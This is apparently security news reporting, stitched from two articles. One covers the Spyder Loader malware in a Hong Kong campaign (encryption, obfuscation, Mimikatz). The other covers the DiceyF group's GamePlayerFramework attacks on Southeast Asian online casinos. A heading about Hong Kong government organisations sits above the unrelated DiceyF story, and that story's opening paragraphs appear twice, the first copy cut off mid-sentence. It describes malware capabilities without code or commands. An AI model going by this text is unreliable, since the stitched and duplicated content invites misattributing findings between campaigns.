The malware executes a created wlbsctrl.dll file that likely acts as a next-stage loader that runs the content of a previously stored blob\_id 2 record — which it encrypts using the AES algorithm in Ciphertext Feedback (CFB) mode with segment\_size of 0x80 bits — from the created FileMapping, researchers explained. The encryption key is based on the name of an affected computer per GetComputerNameW() API, they said.

Spyder Loader also used other obfuscation techniques to prevent its activity from being analyzed, researchers said. In addition to AES encryption, the malware sample also used the ChaCha20 algorithm encryption to obfuscate one of the strings, as well as cleaned up created artifacts by overwriting the content of the dropped wlbsctrl.dll file before deleting it, for example, they said.

There are several similarities between the Spyder Loader activity seen in the Hong Kong campaign and its original functionality as described by Cybereason. They include: use of a modified version of sqlite3.dll; use of the third parameter of its malicious export that's consistent with the rundll32.exe command-line example seen in Cybereason’s research; and use of the CryptoPP C++ library.

In addition to Spyder Loader, credential-stealer Mimikatz and a Trojanized ZLib DLL were among the malware loaded onto victim machines, the researchers said.

The researchers included in their report a list of indicators of compromise for Spyder Loader in the post so enterprises can detect if their systems have been infected. They also encouraged organizations to stay up to date on the latest threats and malware in circulation that may require security updates by referring to Symantec's Protection Bulletins page.

China-Linked Cyber-Espionage Team Homes In on Hong Kong Government Orgs

An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years.
Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet) and DRBControl, citing tactical and targeting similarities as well as the abuse of

An advanced persistent threat (APT) group of Chinese origin codenamed **DiceyF** has been linked to a string of attacks aimed at online casinos in Southeast Asia for years.

Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet) and DRBControl, citing tactical and targeting similarities as well as the abuse of secure messaging clients.

"Possibly we have a mix of espionage and \[intellectual property\] theft, but the true motivations remain a mystery," researchers Kurt Baumgartner and Georgy Kucherin said in a technical write-up published this week.

The starting point of the investigation was in November 2021 when Kaspersky said it detected multiple PlugX loaders and other payloads that were deployed via an employee monitoring service and a security package deployment service.

The initial infection method – the distribution of the framework through security solution packages – afforded the threat actor "to perform cyberespionage activities with some level of stealth," the company stated.

Subsequently, the same security package deployment service is said to have been employed to deliver what's called the GamePlayerFramework, a C# variant of a C++-based malware known as PuppetLoader.

"This 'framework' includes downloaders, launchers, and a set of plugins that provide remote access and steal keystrokes and clipboard data," the researchers explained.

Indications are that the DiceyF activity is a follow-on campaign to Earth Berberoka with a retooled malware toolset, even as the framework is maintained through two separate branches dubbed Tifa and Yuna, which come with different modules of varying levels of sophistication.

While the Tifa branch contains a downloader and a core component, Yuna is more complex in terms of functionality, incorporating a downloader, a set of plugins, and at least 12 PuppetLoader modules. That said, both branches are believed to be actively and incrementally updated.

Regardless of the variant employed, the GamePlayerFramework, once launched, connects to a command-and-control (C2) and transmits information about the compromised host and the clipboard contents, after which the C2 responds with one of 15 commands that allow the malware to seize control of the machine.

This also includes launching a plugin on the victim system that can either be downloaded from the C2 server when the framework is instantiated or retrieved using the "InstallPlugin" command sent by the server.

These plugins, in turn, make it possible to steal cookies from Google Chrome and Mozilla Firefox browsers, capture keystroke and clipboard data, set up virtual desktop sessions, and even remotely connect to the machine over SSH.

Kaspersky also pointed to the use of a malicious app that mimics another software called Mango Employee Account Data Synchronizer, a messenger app used at the targeted entities, to drop the GamePlayerFramework within the network.

"There are many interesting characteristics of DiceyF campaigns and TTPs," the researchers said. "The group modifies their codebase over time, and develops functionality in the code throughout their intrusions."

"To make sure that victims did not become suspicious of the disguised implants, attackers obtained information about targeted organizations (such as the floor where the organization's IT department is located) and included it inside graphic windows displayed to victims."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel